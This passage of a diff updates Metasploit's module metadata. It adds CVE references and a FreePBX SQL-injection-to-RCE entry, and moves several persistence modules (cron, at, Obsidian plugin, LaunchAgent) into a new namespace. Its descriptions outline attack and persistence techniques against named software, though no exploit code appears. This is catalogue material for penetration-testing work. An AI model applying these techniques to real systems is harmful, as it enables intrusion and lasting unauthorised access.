    "description": "This module exploits an information disclosure vulnerability\n          in ZPanel. The vulnerability is due to a vulnerable version\n          of pChart used by ZPanel that allows unauthenticated users to read\n          arbitrary files remotely on the file system. This particular module\n          utilizes this vulnerability to identify the username/password\n          combination of the MySQL instance. With the\n          credentials the attackers can login to PHPMyAdmin and execute\n          SQL commands to drop a malicious payload on the filesystem and\n          call it leading to remote code execution.",
    "references": [
+      "CVE-2013-2097",
      "EDB-31173",
      "OSVDB-102595",
      "URL-http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html",
@@ -121940,7 +122936,7 @@
      "Generic (PHP Payload)",
      "Linux x86"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/zpanel_information_disclosure_rce",
@@ -122231,113 +123227,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_multi/local/obsidian_plugin_persistence": {
-    "name": "Obsidian Plugin Persistence",
-    "fullname": "exploit/multi/local/obsidian_plugin_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2022-09-16",
-    "type": "exploit",
-    "author": [
-      "h00die",
-      "Thomas Byrne"
-    ],
-    "description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n          community plugin to the vault. The vaults must be opened with community\n          plugins enabled (NOT restricted mode), but the plugin will be enabled\n          automatically.\n\n          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
-    "references": [
-      "URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
-      "URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
-      "URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
-      "URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
-      "URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
-    ],
-    "platform": "Linux,OSX,Windows",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Auto",
-      "Linux",
-      "OSX",
-      "Windows"
-    ],
-    "mod_time": "2024-12-14 17:38:29 +0000",
-    "path": "/modules/exploits/multi/local/obsidian_plugin_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "multi/local/obsidian_plugin_persistence",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
-  "exploit_multi/local/periodic_script_persistence": {
-    "name": "Periodic Script Persistence",
-    "fullname": "exploit/multi/local/periodic_script_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2012-04-01",
-    "type": "exploit",
-    "author": [
-      "gardnerapp",
-      "msutovsky-r7"
-    ],
-    "description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n          According to The Art of Mac Malware no such malware species persist in this manner (2024).\n          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
-    "references": [],
-    "platform": "BSD,OSX,Unix",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "OSX",
-      "Python",
-      "Unix",
-      "Bsd"
-    ],
-    "mod_time": "2025-08-29 17:53:07 +0000",
-    "path": "/modules/exploits/multi/local/periodic_script_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "multi/local/periodic_script_persistence",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Stability": [
-        "crash-safe"
-      ],
-      "Reliability": [
-        "repeatable-session",
-        "event-dependent"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "ioc-in-logs"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_multi/local/vagrant_synced_folder_vagrantfile_breakout": {
    "name": "Vagrant Synced Folder Vagrantfile Breakout",
    "fullname": "exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout",
@@ -123046,6 +123935,7 @@
    ],
    "description": "The erlang port mapper daemon is used to coordinate distributed erlang instances.\n          Should an attacker get the authentication cookie RCE is trivial. Usually, this\n          cookie is named \".erlang.cookie\" and varies on location.",
    "references": [
+      "CVE-2020-24719",
      "URL-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/"
    ],
    "platform": "",
@@ -123059,7 +123949,7 @@
      "Windows",
      "Windows (CmdStager)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/misc/erlang_cookie_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/erlang_cookie_rce",
@@ -123092,6 +123982,7 @@
    ],
    "description": "This module uses the FreeSWITCH event socket interface\n          to execute system commands using the `system` API command.\n\n          The event socket service is enabled by default and listens\n          on TCP port 8021 on the local network interface.\n\n          This module has been tested successfully on FreeSWITCH versions:\n\n          1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;\n          1.8.4~64bit on Ubuntu 19.04 (x64); and\n          1.10.1~64bit on Windows 7 SP1 (EN) (x64).",
    "references": [
+      "CVE-2019-19492",
      "CWE-260",
      "URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
    ],
@@ -123107,7 +123998,7 @@
      "Windows (In-Memory)",
      "Windows (Dropper)"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/freeswitch_event_socket_cmd_exec",
@@ -124211,6 +125102,7 @@
    ],
    "description": "This module uses QEMU's Monitor Human Monitor Interface (HMP)\n          TCP server to execute system commands using the `migrate` command.\n\n          This module has been tested successfully on QEMU version 6.2.0\n          on Ubuntu 20.04.",
    "references": [
+      "CVE-2019-12928",
      "URL-https://wiki.qemu.org/ToDo/HMP",
      "URL-https://www.qemu.org/docs/master/system/monitor.html",
      "URL-https://www.qemu.org/docs/master/system/security.html",
@@ -124226,7 +125118,7 @@
      "Unix (Command)",
      "Linux (Dropper)"
    ],
-    "mod_time": "2022-02-07 17:48:27 +0000",
+    "mod_time": "2025-10-07 14:03:32 +0000",
    "path": "/modules/exploits/multi/misc/qemu_monitor_hmp_migrate_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/qemu_monitor_hmp_migrate_cmd_exec",
@@ -124623,7 +125515,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2023-04-06 15:42:39 +0000",
+    "mod_time": "2025-09-23 09:58:50 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattr_extcomp",
@@ -124672,7 +125564,7 @@
      "Windows",
      "Unix"
    ],
-    "mod_time": "2023-04-06 11:43:50 +0000",
+    "mod_time": "2025-09-23 09:58:50 +0000",
    "path": "/modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/weblogic_deserialize_badattrval",
@@ -125134,6 +126026,225 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/persistence/at": {
+    "name": "at(1) Persistence",
+    "fullname": "exploit/multi/persistence/at",
+    "aliases": [
+      "exploits/unix/local/at_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1997-01-01",
+    "type": "exploit",
+    "author": [
+      "Jon Hart <jon_hart@rapid7.com>"
+    ],
+    "description": "This module executes a metasploit payload utilizing at(1) to execute jobs at a specific time.  It should work out of the box\n          with any UNIX-like operating system with atd running.\n          Verified on Kali linux and OSX 13.7.4",
+    "references": [
+      "URL-https://linux.die.net/man/1/at",
+      "URL-https://www.geeksforgeeks.org/at-command-in-linux-with-examples/",
+      "ATT&CK-T1053.002",
+      "ATT&CK-T1053.001"
+    ],
+    "platform": "Linux,OSX,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-06 15:12:16 +0000",
+    "path": "/modules/exploits/multi/persistence/at.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/at",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_multi/persistence/cron": {
+    "name": "Cron Persistence",
+    "fullname": "exploit/multi/persistence/cron",
+    "aliases": [
+      "exploits/linux/local/cron_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "1979-07-01",
+    "type": "exploit",
+    "author": [
+      "h00die <mike@shorebreaksecurity.com>"
+    ],
+    "description": "This module will create a cron or crontab entry to execute a payload.\n          The module includes the ability to automatically clean up those entries to prevent multiple executions.\n          syslog will get a copy of the cron entry.\n          Verified on Ubuntu 22.04.1, MacOS 13.7.4",
+    "references": [
+      "ATT&CK-T1053.003"
+    ],
+    "platform": "Linux,OSX,Unix",
+    "arch": "cmd, x86, x64, armle, aarch64, ppc, mipsle, mipsbe",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Cron",
+      "User Crontab",
+      "OSX User Crontab",
+      "System Crontab"
+    ],
+    "mod_time": "2025-09-18 11:48:17 +0000",
+    "path": "/modules/exploits/multi/persistence/cron.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/cron",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true,
+    "actions": []
+  },
+  "exploit_multi/persistence/obsidian_plugin": {
+    "name": "Obsidian Plugin Persistence",
+    "fullname": "exploit/multi/persistence/obsidian_plugin",
+    "aliases": [
+      "exploits/multi/local/obsidian_plugin_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-16",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Thomas Byrne"
+    ],
+    "description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n          community plugin to the vault. The vaults must be opened with community\n          plugins enabled (NOT restricted mode), but the plugin will be enabled\n          automatically.\n\n          Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
+    "references": [
+      "URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
+      "URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
+      "URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
+      "URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
+      "URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
+    ],
+    "platform": "Linux,OSX,Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto",
+      "Linux",
+      "OSX",
+      "Windows"
+    ],
+    "mod_time": "2025-09-06 15:05:21 +0000",
+    "path": "/modules/exploits/multi/persistence/obsidian_plugin.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/obsidian_plugin",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
+  "exploit_multi/persistence/periodic_script": {
+    "name": "Periodic Script Persistence",
+    "fullname": "exploit/multi/persistence/periodic_script",
+    "aliases": [
+      "exploits/multi/local/periodic_script_persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2012-04-01",
+    "type": "exploit",
+    "author": [
+      "gardnerapp",
+      "msutovsky-r7"
+    ],
+    "description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n          According to The Art of Mac Malware no such malware species persist in this manner (2024).\n          This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
+    "references": [],
+    "platform": "BSD,OSX,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "OSX",
+      "Python",
+      "Unix",
+      "Bsd"
+    ],
+    "mod_time": "2025-10-13 19:54:05 +0000",
+    "path": "/modules/exploits/multi/persistence/periodic_script.rb",
+    "is_install_path": true,
+    "ref_name": "multi/persistence/periodic_script",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_multi/php/ignition_laravel_debug_rce": {
    "name": "Unauthenticated remote code execution in Ignition",
    "fullname": "exploit/multi/php/ignition_laravel_debug_rce",
@@ -127261,6 +128372,7 @@
    ],
    "description": "This module exploits an unauthenticated remote code execution vulnerability in\n          Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.\n          When authentication is disabled on the target system, it allows attackers to execute\n          arbitrary AppleScript commands, which can include shell commands via `do shell script`.\n          All versions up to 2025.7 (including patch versions) are vulnerable.",
    "references": [
+      "CVE-2025-34089",
      "PACKETSTORM-195347"
    ],
    "platform": "OSX,Unix",
@@ -127284,7 +128396,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2025-06-08 15:36:37 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/osx/http/remote_for_mac_rce.rb",
    "is_install_path": true,
    "ref_name": "osx/http/remote_for_mac_rce",
@@ -127704,56 +128816,6 @@
    "needs_cleanup": true,
    "actions": []
  },
-  "exploit_osx/local/persistence": {
-    "name": "Mac OS X Persistent Payload Installer",
-    "fullname": "exploit/osx/local/persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2012-04-01",
-    "type": "exploit",
-    "author": [
-      "Marcin 'Icewall' Noga <marcin@icewall.pl>",
-      "joev <joev@metasploit.com>"
-    ],
-    "description": "This module provides a persistent boot payload by creating a launch item, which can be\n          a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\n          upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with\n          elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.\n          In either case the plist entry specifies an executable that will be run before or at login.",
-    "references": [],
-    "platform": "OSX,Python,Unix",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Mac OS X x64 (Native Payload)",
-      "Mac OS X x86 (Native Payload for 10.14 and earlier)",
-      "Mac OS X Apple Sillicon",
-      "Python payload",
-      "Command payload"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/osx/local/persistence.rb",
-    "is_install_path": true,
-    "ref_name": "osx/local/persistence",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "shell",
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_osx/local/root_no_password": {
    "name": "Mac OS X Root Privilege Escalation",
    "fullname": "exploit/osx/local/root_no_password",
@@ -128435,6 +129497,7 @@
    ],
    "description": "This module exploits a buffer overflow in the IRC client component\n          of UFO: Alien Invasion 2.2.1.",
    "references": [
+      "CVE-2009-10006",
      "OSVDB-65689",
      "EDB-14013"
    ],
@@ -128446,7 +129509,7 @@
    "targets": [
      "Mac OS X 10.5.8 x86, UFOAI 2.2.1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/osx/misc/ufo_ai.rb",
    "is_install_path": true,
    "ref_name": "osx/misc/ufo_ai",
@@ -128467,6 +129530,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/persistence/launch_plist": {
+    "name": "Mac OS X Persistent Payload Installer",
+    "fullname": "exploit/osx/persistence/launch_plist",
+    "aliases": [
+      "exploits/osx/local/persistence"
+    ],
+    "rank": 600,
+    "disclosure_date": "2012-04-01",
+    "type": "exploit",
+    "author": [
+      "Marcin 'Icewall' Noga <marcin@icewall.pl>",
+      "joev <joev@metasploit.com>"
+    ],
+    "description": "This module provides a persistent boot payload by creating a launch item, which can be\n          a LaunchAgent or a LaunchDaemon. LaunchAgents run with user level permissions and are triggered\n          upon login by a plist entry in ~/Library/LaunchAgents. LaunchDaemons run with\n          elevated privilleges, and are launched before user login by a plist entry in the ~/Library/LaunchDaemons directory.\n          In either case the plist entry specifies an executable that will be run before or at login.\n\n          Verified on OSX 11.7.10 (Big Sur)",
+    "references": [
+      "URL-https://taomm.org/vol1/pdfs/CH%202%20Persistence.pdf",
+      "URL-https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html",
+      "ATT&CK-T1647"
+    ],
+    "platform": "OSX,Python,Unix",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Mac OS X x64 (Native Payload)",
+      "Mac OS X x86 (Native Payload for 10.14 and earlier)",
+      "Mac OS X Apple Sillicon",
+      "Python payload",
+      "Command payload"
+    ],
+    "mod_time": "2025-09-23 16:59:26 +0000",
+    "path": "/modules/exploits/osx/persistence/launch_plist.rb",
+    "is_install_path": true,
+    "ref_name": "osx/persistence/launch_plist",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "screen-effects"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_osx/rtsp/quicktime_rtsp_content_type": {
    "name": "MacOS X QuickTime RTSP Content-Type Overflow",
    "fullname": "exploit/osx/rtsp/quicktime_rtsp_content_type",
@@ -129857,6 +130979,7 @@
    ],
    "description": "This module exploits a malicious backdoor that was added to the\n          ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n          archive between November 28th 2010 and 2nd December 2010.",
    "references": [
+      "CVE-2010-20103",
      "OSVDB-69562",
      "BID-45150"
    ],
@@ -129873,7 +130996,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb",
    "is_install_path": true,
    "ref_name": "unix/ftp/proftpd_133c_backdoor",
@@ -129967,6 +131090,7 @@
    ],
    "description": "This module exploits a malicious backdoor that was added to the\tVSFTPD download\n          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n          June 30th 2011 and July 1st 2011 according to the most recent information\n          available. This backdoor was removed on July 3rd 2011.",
    "references": [
+      "CVE-2011-2523",
      "OSVDB-73573",
      "URL-http://pastebin.com/AetT9sS5",
      "URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html"
@@ -129979,7 +131103,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb",
    "is_install_path": true,
    "ref_name": "unix/ftp/vsftpd_234_backdoor",
@@ -130073,6 +131197,7 @@
    ],
    "description": "This module exploits the ContentKeeper Web Appliance. Versions prior\n          to 125.10 are affected. This module exploits a combination of weaknesses\n          to enable remote command execution as the Apache user. By setting\n          SkipEscalation to false, this module will attempt to setuid the bash shell.",
    "references": [
+      "CVE-2009-20011",
      "OSVDB-54551",
      "OSVDB-54552",
      "URL-http://www.aushack.com/200904-contentkeeper.txt"
@@ -130085,7 +131210,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/contentkeeperweb_mimencode.rb",
    "is_install_path": true,
    "ref_name": "unix/http/contentkeeperweb_mimencode",
@@ -130176,6 +131301,7 @@
    ],
    "description": "This module exploits a file upload vulnerability in Kace K1000\n          versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547\n          which allows unauthenticated users to execute arbitrary commands\n          under the context of the 'www' user.\n\n          This module also abuses the 'KSudoClient::RunCommandWait' function\n          to gain root privileges.\n\n          This module has been tested successfully with Dell KACE K1000\n          version 5.3.",
    "references": [
+      "CVE-2014-125113",
      "URL-http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html"
    ],
    "platform": "Unix",
@@ -130199,7 +131325,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/dell_kace_k1000_upload.rb",
    "is_install_path": true,
    "ref_name": "unix/http/dell_kace_k1000_upload",
@@ -130394,6 +131520,66 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/freepbx_unauth_sqli_to_rce": {
+    "name": "FreePBX ajax.php unauthenticated SQLi to RCE",
+    "fullname": "exploit/unix/http/freepbx_unauth_sqli_to_rce",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-08-28",
+    "type": "exploit",
+    "author": [
+      "Echo_Slow",
+      "Piotr Bazydlo",
+      "Sonny"
+    ],
+    "description": "This module exploits an unauthenticated SQL injection flaw in FreePBX prior to versions 15.0.66, 16.0.89,\n          and 17.0.3. The vulnerability lies in the /admin/ajax.php endpoint, which is accessible without\n          authentication. Additionally, the database user created by FreePBX can schedule cronjobs, allowing\n          remote code execution on the target system.",
+    "references": [
+      "CVE-2025-57819",
+      "URL-https://labs.watchtowr.com/you-already-have-our-personal-data-take-our-phone-calls-too-freepbx-cve-2025-57819/"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command"
+    ],
+    "mod_time": "2025-10-20 14:29:19 +0000",
+    "path": "/modules/exploits/unix/http/freepbx_unauth_sqli_to_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/freepbx_unauth_sqli_to_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_unix/http/laravel_token_unserialize_exec": {
    "name": "PHP Laravel Framework token Unserialize Remote Command Execution",
    "fullname": "exploit/unix/http/laravel_token_unserialize_exec",
@@ -130526,6 +131712,7 @@
    ],
    "description": "Maltrail is a malicious traffic detection system, utilizing publicly\n          available blacklists containing malicious and/or generally suspicious trails.\n          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.\n          The `subprocess.check_output` function in `mailtrail/core/httpd.py` contains\n          a command injection vulnerability in the `params.get(\"username\")` parameter.\n          An attacker can exploit this vulnerability by injecting arbitrary OS commands\n          into the username parameter. The injected commands will be executed with the\n          privileges of the running process. This vulnerability can be exploited remotely\n          without authentication.\n\n          Successfully tested against Maltrail versions 0.52 and 0.53.",
    "references": [
+      "CVE-2025-34073",
      "EDB-51676",
      "CVE-2025-34073",
      "URL-https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/",
@@ -130553,7 +131740,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2025-07-03 14:07:14 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/maltrail_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/http/maltrail_rce",
@@ -130809,6 +131996,7 @@
    ],
    "description": "pfSense, a free BSD based open source firewall distribution,\n          version <= 2.3.1_1 contains a remote command execution\n          vulnerability post authentication in the system_groupmanager.php page.\n          Verified against 2.2.6 and 2.3.",
    "references": [
+      "CVE-2016-10709",
      "EDB-43128",
      "URL-https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc"
    ],
@@ -130833,7 +132021,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/pfsense_group_member_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_group_member_exec",
@@ -131051,6 +132239,7 @@
    ],
    "description": "This exploits a command execution vulnerability in Pi-Hole <= 3.3.\n          When adding a new domain to the whitelist, it is possible to chain\n          a command to the domain that is run on the OS.",
    "references": [
+      "CVE-2025-34087",
      "URL-https://pulsesecurity.co.nz/advisories/pihole-v3.3-vulns"
    ],
    "platform": "Linux",
@@ -131074,7 +132263,7 @@
    "targets": [
      "Automatic Target"
    ],
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/pihole_whitelist_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pihole_whitelist_exec",
@@ -131565,6 +132754,7 @@
    ],
    "description": "Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.\n          This allows the attacker to execute arbitrary php code as the context of the web user.",
    "references": [
+      "CVE-2015-10141",
      "URL-https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/",
      "URL-http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/"
    ],
@@ -131589,7 +132779,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
    "path": "/modules/exploits/unix/http/xdebug_unauth_exec.rb",
    "is_install_path": true,
    "ref_name": "unix/http/xdebug_unauth_exec",
@@ -131712,49 +132902,6 @@
    "session_types": false,
    "needs_cleanup": null
  },
-  "exploit_unix/local/at_persistence": {
-    "name": "at(1) Persistence",
-    "fullname": "exploit/unix/local/at_persistence",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "1997-01-01",
-    "type": "exploit",
-    "author": [
-      "Jon Hart <jon_hart@rapid7.com>"
-    ],
-    "description": "This module achieves persistence by executing payloads via at(1).",
-    "references": [],
-    "platform": "Unix",
-    "arch": "cmd",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2023-02-05 15:45:30 +0000",
-    "path": "/modules/exploits/unix/local/at_persistence.rb",
-    "is_install_path": true,
-    "ref_name": "unix/local/at_persistence",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "repeatable-session"
-      ],
-      "Stability": [
-        "crash-safe"
-      ],
-      "SideEffects": [
-        "artifacts-on-disk",
-        "config-changes"
-      ]
-    },
-    "session_types": [],
-    "needs_cleanup": true,
-    "actions": []
-  },
  "exploit_unix/local/chkrootkit": {
    "name": "Chkrootkit Local Privilege Escalation",
    "fullname": "exploit/unix/local/chkrootkit",
@@ -132111,6 +133258,7 @@
    ],
    "description": "The login component of the Polycom Command Shell on Polycom HDX\n          video endpoints, running software versions 3.0.5 and earlier,\n          is vulnerable to an authorization bypass when simultaneous\n          connections are made to the service, allowing remote network\n          attackers to gain access to a sandboxed telnet prompt without\n          authentication. Versions prior to 3.0.4 contain OS command\n          injection in the ping command which can be used to execute\n          arbitrary commands as root.",
    "references": [
+      "CVE-2012-6610",
      "URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
      "URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
      "EDB-24494"
@@ -132123,7 +133271,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-10-06 17:15:11 +0000",
